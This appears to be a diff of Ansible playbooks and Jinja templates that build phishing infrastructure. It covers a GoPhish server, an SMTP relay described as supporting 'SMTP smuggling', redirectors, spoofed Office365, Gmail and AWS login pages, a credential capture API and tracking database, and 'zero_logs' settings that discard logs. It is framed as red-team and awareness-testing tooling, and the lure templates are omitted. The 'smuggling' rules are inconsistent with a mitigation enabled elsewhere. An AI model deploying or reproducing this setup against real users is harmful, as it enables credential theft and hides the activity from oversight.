dest: "/opt/gophish/templates/landing/{{ item }}_landing.html"
owner: gophish
group: gophish
mode: '0644'
loop:
- office365
- generic
- fedramp
vars:
template_type: "{{ item }}"
- name: Install enhanced tracking pixel
copy:
src: "../../tracker/files/simple_email_tracker.py"
dest: /opt/gophish/tracker.py
owner: gophish
group: gophish
mode: '0755'
- name: Create Gophish database backup script
template:
src: "../templates/phishing/gophish-backup.sh.j2"
dest: /opt/gophish/backup.sh
owner: gophish
group: gophish
mode: '0755'
- name: Set up database backup cron
cron:
name: "Backup Gophish database"
minute: "0"
hour: "*/6"
job: "/opt/gophish/backup.sh"
user: gophish
- name: Create Gophish systemd service
template:
src: "../templates/phishing/gophish.service.j2"
dest: /etc/systemd/system/gophish.service
mode: '0644'
- name: Enable and start Gophish service
systemd:
name: gophish
state: started
enabled: yes
daemon_reload: yes
- name: Create campaign automation script
template:
src: "../templates/phishing/campaign-automation.py.j2"
dest: /opt/gophish/campaign-automation.py
owner: gophish
group: gophish
mode: '0755'
- name: Install Python dependencies for automation
pip:
name:
- requests
- python-dateutil
- jinja2
state: present
- name: Configure SMTP relay to MTA front
blockinfile:
path: /opt/gophish/config.json
marker: "// {mark} ANSIBLE MANAGED SMTP CONFIG"
block: |
"smtp": {
"host": "{{ mta_front_ip }}:587",
"username": "{{ smtp_relay_user }}",
"password": "{{ smtp_relay_pass }}",
"from": "{{ sender_email }}",
"ignore_cert_errors": true
}
- name: Create phishing metrics dashboard
template:
src: "../templates/phishing/metrics-dashboard.html.j2"
dest: /opt/gophish/static/metrics.html
owner: gophish
group: gophish
mode: '0644'
- name: Set up log aggregation
lineinfile:
path: /etc/rsyslog.conf
line: "local0.* /var/log/gophish.log"
state: present
notify: restart rsyslog
- name: Configure log rotation for Gophish
copy:
dest: /etc/logrotate.d/gophish
content: |
/var/log/gophish.log {
daily
missingok
rotate 30
compress
delaycompress
notifempty
create 0644 gophish gophish
}
handlers:
- name: restart rsyslog
service:
name: rsyslog
state: restarted
@@ -0,0 +1,296 @@
---
# Common tasks for configuring advanced phishing server
# Supports both red team and FedRAMP compliance modes
- name: Update system packages
apt:
update_cache: yes
upgrade: dist
- name: Install base packages for phishing server
apt:
name:
- nginx
- certbot
- python3-certbot-nginx
- postfix
- dovecot-core
- dovecot-imapd
- opendkim
- opendkim-tools
- sqlite3
- git
- curl
- wget
- jq
- unzip
- python3-pip
- python3-venv
- nodejs
- npm
- php-fpm
- php-sqlite3
- php-curl
- php-json
- swaks
- dnsutils
- net-tools
- fail2ban
state: present
- name: Create phishing tools directory
file:
path: "{{ item }}"
state: directory
mode: '0755'
owner: root
group: root
with_items:
- /root/Tools/phishing
- /root/Tools/phishing/templates
- /root/Tools/phishing/campaigns
- /root/Tools/phishing/logs
- /var/www/phishing
- /var/www/phishing/assets
- /var/www/phishing/api
- name: Set up GoPhish directory
file:
path: /root/Tools/gophish
state: directory
mode: '0755'
- name: Download latest GoPhish release
shell: |
LATEST_URL=$(curl -s https://api.github.com/repos/gophish/gophish/releases/latest | jq -r '.assets[] | select(.browser_download_url | contains("linux-64bit.zip")) | .browser_download_url')
curl -L "$LATEST_URL" -o /tmp/gophish.zip
unzip /tmp/gophish.zip -d /root/Tools/gophish
chmod +x /root/Tools/gophish/gophish
rm -f /tmp/gophish.zip
args:
creates: /root/Tools/gophish/gophish
- name: Create advanced GoPhish configuration
template:
src: "../templates/advanced-gophish-config.j2"
dest: "/root/Tools/gophish/config.json"
mode: '0600'
owner: root
group: root
- name: Create GoPhish systemd service
template:
src: "../templates/gophish.service.j2"
dest: "/etc/systemd/system/gophish.service"
mode: '0644'
owner: root
group: root
- name: Configure Postfix for outbound email
template:
src: "../templates/postfix-phishing.conf.j2"
dest: "/etc/postfix/main.cf"
backup: yes
notify: restart postfix
- name: Configure OpenDKIM for email authentication
template:
src: "../templates/opendkim-phishing.conf.j2"
dest: "/etc/opendkim.conf"
backup: yes
notify: restart opendkim
- name: Create DKIM keys directory
file:
path: "/etc/opendkim/keys/{{ phishing_domain }}"
state: directory
owner: opendkim
group: opendkim
mode: '0700'
- name: Generate DKIM keys
command: >
opendkim-genkey -D /etc/opendkim/keys/{{ phishing_domain }}
-d {{ phishing_domain }} -s phishing
args:
creates: "/etc/opendkim/keys/{{ phishing_domain }}/phishing.private"
- name: Set DKIM key permissions
file:
path: "/etc/opendkim/keys/{{ phishing_domain }}/phishing.private"
owner: opendkim
group: opendkim
mode: '0600'
- name: Create phishing landing page templates
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0644'
owner: www-data
group: www-data
with_items:
- { src: "../templates/phishing-landing-office365.html.j2", dest: "/var/www/phishing/office365.html" }
- { src: "../templates/phishing-landing-gmail.html.j2", dest: "/var/www/phishing/gmail.html" }
- { src: "../templates/phishing-landing-aws.html.j2", dest: "/var/www/phishing/aws.html" }
- { src: "../templates/phishing-landing-generic.html.j2", dest: "/var/www/phishing/generic.html" }
- name: Create credential capture API
template:
src: "../templates/credential-capture-api.php.j2"
dest: "/var/www/phishing/api/capture.php"
mode: '0644'
owner: www-data
group: www-data
- name: Create tracking pixel endpoint
template:
src: "../templates/tracking-pixel.php.j2"
dest: "/var/www/phishing/track.php"
mode: '0644'
owner: www-data
group: www-data
- name: Configure Nginx for phishing sites
template:
src: "../templates/nginx-phishing.conf.j2"
dest: "/etc/nginx/sites-available/phishing"
mode: '0644'
notify: reload nginx
- name: Enable phishing site
file:
src: /etc/nginx/sites-available/phishing
dest: /etc/nginx/sites-enabled/phishing
state: link
notify: reload nginx
- name: Create phishing campaign management scripts
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0755'
owner: root
group: root
with_items:
- { src: "../templates/campaign-launcher.sh.j2", dest: "/root/Tools/phishing/launch-campaign.sh" }
- { src: "../templates/stats-collector.sh.j2", dest: "/root/Tools/phishing/collect-stats.sh" }
- { src: "../templates/email-validator.py.j2", dest: "/root/Tools/phishing/validate-emails.py" }
- name: Create database for tracking
shell: |
sqlite3 /root/Tools/phishing/tracking.db << EOF
CREATE TABLE IF NOT EXISTS email_opens (
id INTEGER PRIMARY KEY AUTOINCREMENT,
campaign_id TEXT NOT NULL,
recipient_email TEXT NOT NULL,
ip_address TEXT,
user_agent TEXT,
opened_at DATETIME DEFAULT CURRENT_TIMESTAMP,
location TEXT
);
CREATE TABLE IF NOT EXISTS link_clicks (
id INTEGER PRIMARY KEY AUTOINCREMENT,
campaign_id TEXT NOT NULL,
recipient_email TEXT NOT NULL,
link_url TEXT NOT NULL,
ip_address TEXT,
user_agent TEXT,
clicked_at DATETIME DEFAULT CURRENT_TIMESTAMP,
location TEXT
);
CREATE TABLE IF NOT EXISTS credential_submissions (
id INTEGER PRIMARY KEY AUTOINCREMENT,
campaign_id TEXT NOT NULL,
recipient_email TEXT,
username TEXT,
password_hash TEXT,
ip_address TEXT,
user_agent TEXT,
submitted_at DATETIME DEFAULT CURRENT_TIMESTAMP,
location TEXT,
additional_data TEXT
);
CREATE TABLE IF NOT EXISTS campaigns (
id TEXT PRIMARY KEY,
name TEXT NOT NULL,
template TEXT NOT NULL,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
status TEXT DEFAULT 'active',
target_count INTEGER DEFAULT 0,
opened_count INTEGER DEFAULT 0,
clicked_count INTEGER DEFAULT 0,
submitted_count INTEGER DEFAULT 0
);
EOF
args:
creates: /root/Tools/phishing/tracking.db
- name: Set database permissions
file:
path: /root/Tools/phishing/tracking.db
owner: www-data
group: www-data
mode: '0644'
- name: Install Python dependencies for advanced features
pip:
name:
- requests
- beautifulsoup4
- lxml
- flask
- flask-cors
- dnspython
- python-whois
- selenium
- fake-useragent
state: present
- name: Create SSL certificate setup script
template:
src: "../templates/setup-phishing-ssl.sh.j2"
dest: "/root/Tools/phishing/setup-ssl.sh"
mode: '0755'
owner: root
group: root
- name: Create domain reputation checker
template:
src: "../templates/domain-reputation.py.j2"
dest: "/root/Tools/phishing/check-reputation.py"
mode: '0755'
owner: root
group: root
- name: Start and enable services
systemd:
name: "{{ item }}"
state: started
enabled: yes
daemon_reload: yes
with_items:
- postfix
- opendkim
- nginx
- php7.4-fpm
- gophish
handlers:
- name: restart postfix
systemd:
name: postfix
state: restarted
- name: restart opendkim
systemd:
name: opendkim
state: restarted
- name: reload nginx
systemd:
name: nginx
state: reloaded
@@ -0,0 +1,42 @@
{
"admin_server": {
"listen_url": "127.0.0.1:{{ gophish_admin_port }}",
"use_tls": true,
"cert_path": "/etc/letsencrypt/live/{{ phishing_domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ phishing_domain }}/privkey.pem",
"trusted_origins": []
},
"phish_server": {
"listen_url": "0.0.0.0:{{ gophish_phish_port | default(8081) }}",
"use_tls": false,
"cert_path": "",
"key_path": ""
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "{{ smtp_from_address | default('noreply@' + domain) }}",
"logging": {
"filename": "{{ '/dev/null' if zero_logs | default(true) else 'gophish.log' }}",
"level": "{{ 'error' if zero_logs | default(true) else 'info' }}"
},
"webhook": {
"enabled": {{ enable_webhooks | default(false) | lower }},
"url": "{{ webhook_url | default('') }}",
"secret": "{{ webhook_secret | default('') }}"
},
"email": {
"smtp": {
"host": "{{ mta_front_ip | default('127.0.0.1') }}",
"port": 25,
"use_auth": true,
"username": "{{ smtp_auth_user }}",
"password": "{{ smtp_auth_pass }}",
"from_address": "{{ smtp_from_address | default('noreply@' + domain) }}",
"ignore_cert_errors": true
},
"imap": {
"enabled": false
}
}
}
@@ -0,0 +1,23 @@
{
"admin_server": {
"listen_url": "0.0.0.0:{{ gophish_admin_port }}",
"use_tls": true,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem",
"trusted_origins": []
},
"phish_server": {
"listen_url": "0.0.0.0:8081",
"use_tls": false,
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
},
"db_name": "sqlite3",
"db_path": "gophish.db",
"migrations_prefix": "db/db_",
"contact_address": "",
"logging": {
"filename": "",
"level": ""
}
}
@@ -0,0 +1,22 @@
# modules/phishing/gophish/templates/gophish-opsec.yaotl.j2
gophish:
admin_server:
# Only listen on localhost
listen_url: "127.0.0.1:{{ gophish_admin_port }}"
# Use client certificates
use_tls: true
tls_cert: "/opt/gophish/admin-cert.pem"
tls_key: "/opt/gophish/admin-key.pem"
client_ca: "/opt/gophish/client-ca.pem"
phish_server:
# Behind nginx, no direct exposure
listen_url: "127.0.0.1:{{ gophish_phish_port }}"
# Custom modifications
modifications:
- remove_default_headers: true
- randomize_endpoints: true
- custom_tracking_pixel: true
- encrypted_storage: true
- auto_purge_days: 7
+51
View File
@@ -0,0 +1,51 @@
---
# Advanced Gophish server deployment with enhanced features
- name: Deploy Gophish server
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
gophish_instance_type: "{{ gophish_instance_type | default('t3.large') }}"
gophish_region: "{{ gophish_region | default(aws_region) }}"
tasks:
- name: Create Gophish instance
include_tasks: "../../providers/AWS/tasks/create_instance.yml"
vars:
instance_name: "{{ server_name }}"
instance_type: "{{ gophish_instance_type }}"
region: "{{ gophish_region }}"
security_group_rules:
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
- { proto: tcp, port: 3333, cidr: "{{ operator_ip }}/32", desc: "Gophish admin" }
- { proto: tcp, port: 25, cidr: "{{ mta_front_ip | default('10.0.0.0/8') }}/32", desc: "SMTP from MTA" }
- { proto: tcp, port: 80, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTP from redirector" }
- name: Add Gophish to inventory
add_host:
name: "gophish_server"
groups: "gophish_servers"
ansible_host: "{{ instance_ip }}"
ansible_user: "{{ ansible_user | default('ubuntu') }}"
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
- name: Configure Gophish server
hosts: gophish_servers
become: true
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Include advanced Gophish configuration
include_tasks: "gophish/tasks/configure_gophish_advanced.yml"
- name: Include security hardening
include_tasks: "../../common/tasks/security_hardening.yml"
- name: Include tracker setup
include_tasks: "../../c2/tasks/configure_integrated_tracker.yml"
when: deploy_tracker | default(true) | bool
@@ -0,0 +1,151 @@
---
# Configure MTA Front server for email relay and SMTP smuggling
- name: Update system packages
apt:
update_cache: yes
upgrade: dist
- name: Install MTA packages
apt:
name:
- postfix
- postfix-pcre
- dovecot-core
- dovecot-imapd
- opendkim
- opendkim-tools
- python3-pip
- python3-venv
- nginx
- certbot
- python3-certbot-nginx
- dnsutils
- swaks
- telnet
state: present
- name: Configure Postfix for MTA fronting
template:
src: "../templates/phishing/postfix-mta-front.j2"
dest: /etc/postfix/main.cf
backup: yes
notify: restart postfix
- name: Configure Postfix master.cf for advanced relaying
blockinfile:
path: /etc/postfix/master.cf
block: |
# SMTP smuggling and advanced relay configurations
587 inet n - y - - smtpd
-o syslog_name=postfix/submission
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_tls_wrappermode=no
-o smtpd_client_restrictions=permit_sasl_authenticated,reject
-o smtpd_relay_restrictions=permit_sasl_authenticated,reject
-o milter_macro_daemon_name=ORIGINATING
# SMTP smuggling support
cleanup unix n - y - 0 cleanup
-o header_checks=pcre:/etc/postfix/header_checks
-o nested_header_checks=pcre:/etc/postfix/nested_header_checks
- name: Create SMTP smuggling header checks
copy:
dest: /etc/postfix/header_checks
content: |
# SMTP smuggling techniques
/^Content-Transfer-Encoding:\s*7bit/i REPLACE Content-Transfer-Encoding: 8bit
/^Content-Type:\s*text\/plain/i REPLACE Content-Type: text/html
mode: '0644'
notify:
- reload postfix
- postmap header_checks
- name: Create nested header checks for advanced smuggling
copy:
dest: /etc/postfix/nested_header_checks
content: |
# Advanced SMTP smuggling patterns
/^\s*<script/i IGNORE
/^\s*<iframe/i IGNORE
mode: '0644'
notify:
- reload postfix
- postmap nested_header_checks
- name: Configure DKIM for domain reputation
include_tasks: ../tasks/configure_mail.yml
- name: Create relay authentication
copy:
dest: /etc/postfix/sasl_passwd
content: |
{{ phishing_domain }} {{ smtp_relay_user }}:{{ smtp_relay_pass }}
mode: '0600'
owner: root
group: root
notify:
- postmap sasl_passwd
- restart postfix
- name: Configure transport maps for backend routing
copy:
dest: /etc/postfix/transport
content: |
{{ phishing_domain }} smtp:[{{ gophish_ip }}]:25
.{{ phishing_domain }} smtp:[{{ gophish_ip }}]:25
mode: '0644'
notify:
- postmap transport
- restart postfix
- name: Install Python SMTP testing tools
pip:
name:
- smtplib-extended
- email-validator
- faker
state: present
- name: Create SMTP smuggling test script
template:
src: "../templates/phishing/smtp-smuggling-test.py.j2"
dest: /root/Tools/smtp-smuggling-test.py
mode: '0755'
- name: Create email reputation monitoring script
template:
src: "../templates/phishing/reputation-monitor.sh.j2"
dest: /root/Tools/reputation-monitor.sh
mode: '0755'
- name: Set up log monitoring for deliverability
cron:
name: "Monitor email deliverability"
minute: "*/15"
job: "/root/Tools/reputation-monitor.sh >> /var/log/reputation.log 2>&1"
handlers:
- name: restart postfix
service:
name: postfix
state: restarted
- name: reload postfix
service:
name: postfix
state: reloaded
- name: postmap header_checks
command: postmap /etc/postfix/header_checks
- name: postmap nested_header_checks
command: postmap /etc/postfix/nested_header_checks
- name: postmap sasl_passwd
command: postmap /etc/postfix/sasl_passwd
- name: postmap transport
command: postmap /etc/postfix/transport
@@ -0,0 +1,71 @@
# Postfix MTA Front Configuration for Phishing Infrastructure
# This server acts as the front-end mail relay
# Basic settings
myhostname = {{ mta_hostname | default('mail.' + domain) }}
mydomain = {{ domain }}
myorigin = $mydomain
mydestination = $myhostname, localhost
inet_interfaces = all
inet_protocols = ipv4
# Network settings
mynetworks = 127.0.0.0/8 {{ gophish_server_ip }}/32 {{ mta_allowed_ips | default([]) | join(' ') }}
relay_domains = $mydestination
# SMTP smuggling mitigation
smtpd_forbid_bare_newline = yes
smtpd_forbid_bare_newline_reject_code = 550
# TLS Configuration
smtpd_tls_cert_file = /etc/letsencrypt/live/{{ mta_hostname | default('mail.' + domain) }}/fullchain.pem
smtpd_tls_key_file = /etc/letsencrypt/live/{{ mta_hostname | default('mail.' + domain) }}/privkey.pem
smtpd_use_tls = yes
smtpd_tls_security_level = may
smtpd_tls_protocols = !SSLv2, !SSLv3, !TLSv1, !TLSv1.1
smtp_tls_security_level = may
# SASL Authentication
smtpd_sasl_auth_enable = yes
smtpd_sasl_type = dovecot
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_authenticated_header = yes
# Restrictions
smtpd_helo_required = yes
smtpd_recipient_restrictions =
permit_mynetworks,
permit_sasl_authenticated,
reject_unauth_destination,
reject_unauth_pipelining,
reject_invalid_helo_hostname,
reject_non_fqdn_helo_hostname
# Rate limiting
smtpd_client_connection_rate_limit = {{ rate_limit_connections | default(100) }}
smtpd_client_message_rate_limit = {{ rate_limit_messages | default(100) }}
# Message size and queue settings
message_size_limit = {{ max_message_size | default(10240000) }}
mailbox_size_limit = 0
queue_lifetime = 1h
maximal_queue_lifetime = 1h
bounce_queue_lifetime = 0
# Header modifications
header_checks = regexp:/etc/postfix/header_checks
# DKIM signing
milter_default_action = accept
milter_protocol = 6
smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock
non_smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock
# Logging
{% if zero_logs | default(true) %}
# Zero-logs configuration
syslog_facility = local0
syslog_name =
maillog_file = /dev/null
{% endif %}
+51
View File
@@ -0,0 +1,51 @@
---
# MTA Front server deployment for email relay and SMTP smuggling
- name: Deploy MTA Front server
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
mta_instance_type: "{{ mta_instance_type | default('t3.medium') }}"
mta_region: "{{ mta_region | default(aws_region) }}"
tasks:
- name: Create MTA Front instance
include_tasks: "../tasks/create_instance.yml"
vars:
instance_name: "{{ server_name }}"
instance_type: "{{ mta_instance_type }}"
region: "{{ mta_region }}"
security_group_rules:
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
- { proto: tcp, port: 25, cidr: "0.0.0.0/0", desc: "SMTP from anywhere" }
- { proto: tcp, port: 587, cidr: "0.0.0.0/0", desc: "SMTP submission" }
- { proto: tcp, port: 465, cidr: "0.0.0.0/0", desc: "SMTPS" }
- name: Add MTA Front to inventory
add_host:
name: "mta_front"
groups: "mta_fronts"
ansible_host: "{{ instance_ip }}"
ansible_user: "{{ ansible_user | default('ubuntu') }}"
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
- name: Configure MTA Front server
hosts: mta_fronts
become: true
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Include MTA Front configuration
include_tasks: "../tasks/configure_mta_front.yml"
- name: Include security hardening
include_tasks: "../tasks/security_hardening.yml"
- name: Include tracker setup
include_tasks: "../tasks/configure_integrated_tracker.yml"
when: deploy_tracker | default(true) | bool
+46
View File
@@ -0,0 +1,46 @@
---
# Phishing redirector deployment with advanced evasion
- name: Deploy phishing redirector
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
redirector_instance_type: "{{ redirector_instance_type | default('t3.small') }}"
redirector_region: "{{ redirector_region | default(aws_region) }}"
tasks:
- name: Create phishing redirector instance
include_tasks: "../../providers/AWS/tasks/create_instance.yml"
vars:
instance_name: "{{ server_name }}"
instance_type: "{{ redirector_instance_type }}"
region: "{{ redirector_region }}"
security_group_rules:
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
- { proto: tcp, port: 80, cidr: "0.0.0.0/0", desc: "HTTP from anywhere" }
- { proto: tcp, port: 443, cidr: "0.0.0.0/0", desc: "HTTPS from anywhere" }
- name: Add phishing redirector to inventory
add_host:
name: "phishing_redirector"
groups: "phishing_redirectors"
ansible_host: "{{ instance_ip }}"
ansible_user: "{{ ansible_user | default('ubuntu') }}"
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
- name: Configure phishing redirector
hosts: phishing_redirectors
become: true
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Include phishing redirector configuration
include_tasks: "../redirectors/templates/configure_phishing_redirector.yml"
- name: Include security hardening
include_tasks: "../../common/tasks/security_hardening.yml"
+50
View File
@@ -0,0 +1,50 @@
---
# Phishing web server for credential harvesting
- name: Deploy phishing web server
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
webserver_instance_type: "{{ webserver_instance_type | default('t3.medium') }}"
webserver_region: "{{ webserver_region | default(aws_region) }}"
tasks:
- name: Create phishing web server instance
include_tasks: "../tasks/create_instance.yml"
vars:
instance_name: "{{ server_name }}"
instance_type: "{{ webserver_instance_type }}"
region: "{{ webserver_region }}"
security_group_rules:
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
- { proto: tcp, port: 80, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTP from redirector" }
- { proto: tcp, port: 443, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTPS from redirector" }
- name: Add phishing web server to inventory
add_host:
name: "phishing_webserver"
groups: "phishing_webservers"
ansible_host: "{{ instance_ip }}"
ansible_user: "{{ ansible_user | default('ubuntu') }}"
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
- name: Configure phishing web server
hosts: phishing_webservers
become: true
gather_facts: true
vars_files:
- vars.yaml
tasks:
- name: Include phishing web server configuration
include_tasks: "../tasks/configure_phishing_webserver.yml"
- name: Include security hardening
include_tasks: "../tasks/security_hardening.yml"
- name: Include tracker setup
include_tasks: "../tasks/configure_integrated_tracker.yml"
when: deploy_tracker | default(true) | bool
@@ -0,0 +1,111 @@
---
# FedRAMP compliance configuration for user awareness testing
- name: Create FedRAMP compliant landing pages
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0644'
owner: www-data
group: www-data
with_items:
- { src: "../templates/fedramp-success-page.html.j2", dest: "/var/www/phishing/fedramp-success.html" }
- { src: "../templates/fedramp-education-page.html.j2", dest: "/var/www/phishing/fedramp-education.html" }
- { src: "../templates/fedramp-training-materials.html.j2", dest: "/var/www/phishing/training.html" }
- name: Create FedRAMP compliant email templates
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0644'
owner: root
group: root
with_items:
- { src: "../templates/fedramp-email-template.html.j2", dest: "/root/Tools/phishing/templates/fedramp-email.html" }
- { src: "../templates/fedramp-notification-email.html.j2", dest: "/root/Tools/phishing/templates/fedramp-notification.html" }
- name: Configure anonymized reporting
template:
src: "../templates/fedramp-reporting.py.j2"
dest: "/root/Tools/phishing/fedramp-reporting.py"
mode: '0755'
owner: root
group: root
- name: Create role-based tracking system
template:
src: "../templates/role-tracking.py.j2"
dest: "/root/Tools/phishing/role-tracking.py"
mode: '0755'
owner: root
group: root
- name: Set up immediate phish identification
template:
src: "../templates/immediate-identification.js.j2"
dest: "/var/www/phishing/assets/immediate-identification.js"
mode: '0644'
owner: www-data
group: www-data
- name: Create educational content delivery system
template:
src: "../templates/education-delivery.php.j2"
dest: "/var/www/phishing/api/education.php"
mode: '0644'
owner: www-data
group: www-data
- name: Configure compliance database schema
shell: |
sqlite3 /root/Tools/phishing/compliance.db << EOF
CREATE TABLE IF NOT EXISTS fedramp_campaigns (
id TEXT PRIMARY KEY,
name TEXT NOT NULL,
csp_organization TEXT NOT NULL,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
status TEXT DEFAULT 'active'
);
CREATE TABLE IF NOT EXISTS role_interactions (
id INTEGER PRIMARY KEY AUTOINCREMENT,
campaign_id TEXT NOT NULL,
user_role TEXT NOT NULL,
interaction_type TEXT NOT NULL,
interaction_time DATETIME DEFAULT CURRENT_TIMESTAMP,
education_completed BOOLEAN DEFAULT FALSE
);
CREATE TABLE IF NOT EXISTS compliance_metrics (
id INTEGER PRIMARY KEY AUTOINCREMENT,
campaign_id TEXT NOT NULL,
metric_type TEXT NOT NULL,
metric_value INTEGER NOT NULL,
recorded_at DATETIME DEFAULT CURRENT_TIMESTAMP
);
EOF
args:
creates: /root/Tools/phishing/compliance.db
- name: Set database permissions for compliance
file:
path: /root/Tools/phishing/compliance.db
owner: www-data
group: www-data
mode: '0644'
- name: Create compliance report generator
template:
src: "../templates/compliance-report-generator.py.j2"
dest: "/root/Tools/phishing/generate-compliance-report.py"
mode: '0755'
owner: root
group: root
- name: Configure email allowlisting instructions
template:
src: "../templates/allowlist-instructions.md.j2"
dest: "/root/Tools/phishing/ALLOWLIST_INSTRUCTIONS.md"
mode: '0644'
owner: root
group: root
@@ -0,0 +1,8 @@
{# OMITTED — file_share phishing email template #}
{#
Jinja2 email template for the file_share lure scenario. Rendered at deploy
time with target organization name, sender domain, and tracking pixel URL
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
Omitted from public release. Present in operational deployments.
#}
@@ -0,0 +1,8 @@
{# OMITTED — office365_login phishing email template #}
{#
Jinja2 email template for the office365_login lure scenario. Rendered at deploy
time with target organization name, sender domain, and tracking pixel URL
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
Omitted from public release. Present in operational deployments.
#}
@@ -0,0 +1,8 @@
{# OMITTED — password_expiry phishing email template #}
{#
Jinja2 email template for the password_expiry lure scenario. Rendered at deploy
time with target organization name, sender domain, and tracking pixel URL
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
Omitted from public release. Present in operational deployments.
#}
@@ -0,0 +1,8 @@
{# OMITTED — security_alert phishing email template #}
{#
Jinja2 email template for the security_alert lure scenario. Rendered at deploy
time with target organization name, sender domain, and tracking pixel URL
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
Omitted from public release. Present in operational deployments.
#}
@@ -0,0 +1,8 @@
{# OMITTED — trellix-sub phishing email template #}
{#
Jinja2 email template for the trellix-sub lure scenario. Rendered at deploy
time with target organization name, sender domain, and tracking pixel URL
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
Omitted from public release. Present in operational deployments.
#}
@@ -0,0 +1,5 @@
{# OMITTED — FedRAMP compliance lure template #}
{#
Phishing page styled to mimic a FedRAMP compliance portal. Used in
engagements targeting federal contractors. Omitted from public release.
#}
@@ -0,0 +1,69 @@
{
"deployment_id": "{{ deployment_id }}",
"deployment_time": "{{ ansible_date_time.iso8601 }}",
"provider": "{{ provider }}",
"region": "{{ aws_region | default(linode_region) | default('') }}",
"infrastructure": {
"mta_front": {
"name": "{{ mta_front_name | default('mta-' + deployment_id) }}",
"ip": "{{ mta_front_ip | default('') }}",
"instance_id": "{{ mta_instance_id | default('') }}"
},
"gophish_server": {
"name": "{{ gophish_server_name | default('gophish-' + deployment_id) }}",
"ip": "{{ gophish_server_ip | default('') }}",
"instance_id": "{{ gophish_instance_id | default('') }}",
"admin_port": "{{ gophish_admin_port | default('8090') }}"
},
"phishing_webserver": {
"name": "{{ phishing_web_name | default('web-' + deployment_id) }}",
"ip": "{{ phishing_web_ip | default('') }}",
"instance_id": "{{ phishing_web_instance_id | default('') }}"
},
"phishing_redirector": {
"name": "{{ phishing_redirector_name | default('redirector-' + deployment_id) }}",
"ip": "{{ phishing_redirector_ip | default('') }}",
"instance_id": "{{ phishing_redirector_instance_id | default('') }}"
},
{% if deploy_payload_infra | default(false) %}
"payload_server": {
"name": "{{ payload_server_name | default('payload-' + deployment_id) }}",
"ip": "{{ payload_server_ip | default('') }}",
"instance_id": "{{ payload_server_instance_id | default('') }}"
},
"payload_redirector": {
"name": "{{ payload_redirector_name | default('payload-redir-' + deployment_id) }}",
"ip": "{{ payload_redirector_ip | default('') }}",
"instance_id": "{{ payload_redirector_instance_id | default('') }}"
},
{% endif %}
},
"domains": {
"phishing_domain": "{{ phishing_domain | default('N/A') }}",
"mta_domain": "{{ mta_hostname | default('mail.' + (phishing_domain | default('example.com'))) }}",
{% if deploy_payload_infra | default(false) %}
"payload_domain": "{{ payload_subdomain | default('payload') }}.{{ phishing_domain | default('example.com') }}",
{% endif %}
},
"credentials": {
"gophish_url": "https://{{ gophish_server_ip | default('TBD') }}:{{ gophish_admin_port | default('8090') }}",
"smtp_auth_user": "{{ smtp_auth_user | default('admin') }}",
"smtp_settings": {
"host": "{{ mta_front_ip | default('TBD') }}",
"port": 25,
"from_address": "{{ smtp_from_address | default('noreply@' + (phishing_domain | default('example.com'))) }}"
}
},
"security_groups": {
{% if provider == 'aws' %}
"mta_sg": "{{ mta_security_group_id | default('') }}",
"gophish_sg": "{{ gophish_security_group_id | default('') }}",
"web_sg": "{{ web_security_group_id | default('') }}",
"redirector_sg": "{{ redirector_security_group_id | default('') }}"
{% endif %}
}
}
@@ -0,0 +1,85 @@
---
# Configure phishing web server with landing pages and credential capture
- name: Install required packages
apt:
name:
- nginx
- php-fpm
- php-json
- certbot
- python3-certbot-nginx
state: present
update_cache: yes
- name: Create web directories
file:
path: "{{ item }}"
state: directory
mode: '0755'
owner: www-data
group: www-data
loop:
- /var/www/phishing
- /var/www/phishing/templates
- /var/www/phishing/static
- /var/www/phishing/captures
- /var/private/phishing_creds
- name: Deploy phishing templates
template:
src: "{{ item.src }}"
dest: "{{ item.dest }}"
mode: '0644'
owner: www-data
group: www-data
loop:
